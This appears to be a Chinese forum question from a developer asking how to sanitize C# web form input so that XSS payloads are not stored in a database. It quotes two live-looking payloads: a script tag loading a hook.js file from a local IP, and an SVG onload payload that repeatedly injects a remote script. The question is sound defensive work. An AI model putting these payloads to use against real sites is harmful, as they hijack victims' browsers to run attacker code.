在Web应用程序中,假设它由两个文本输入组成。我需要先清理输入,然后再将输入存储在数据库中,
作为示例用户输入<script src="http://192.168.1.122:3000/hook.js">Test</script>
需要以Test的形式存储在数据库中以避免XSS。
我检查了此问题How to use C# to sanitize input on an html page?并找到了答案https://stackoverflow.com/a/39838549/3703534。但是任何人都可以提供示例代码以了解如何使用它。这是避免XSS攻击的好方法吗?
如果用户在输入中输入了这种类型的棋盘,
<script src="http://192.168.1.122:3000/hook.js"></script>
和
<svg/onload=setInterval(function(){with(document)body.
appendChild(createElement("script")).src="//HOST:PORT"},0)>
如何预防。